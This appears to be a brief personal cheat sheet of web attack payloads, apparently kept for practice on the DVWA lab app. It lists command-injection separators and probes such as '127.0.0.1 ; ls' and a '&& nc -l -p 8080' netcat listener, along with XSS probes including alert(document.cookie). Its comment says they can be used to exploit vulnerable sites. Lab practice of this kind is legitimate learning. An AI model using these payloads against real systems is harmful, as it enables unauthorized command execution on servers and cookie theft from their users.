####command injection#####
-h #Linux help
/? #win
PARAM ; echo Command injected
echo Injected| #perl

#parameters to check for sanitization
'';!--"<XSS>=&{()}

#
<script>alert(document.domain);</script>
<script>alert(document.cookie);</script>

#example try out on dwva:
127.0.0.1
127.0.0.1 ; ls #any command here
#also try
127.0.0.1 && command

||  #
|
||
&
&&
;
#all of these are AND operators; can be used to exploit on vuln sites that allow commands to be run

#is nc on the system? stuff can be done with that
127.0.0.1 && nc -l -p 8080

####xss####
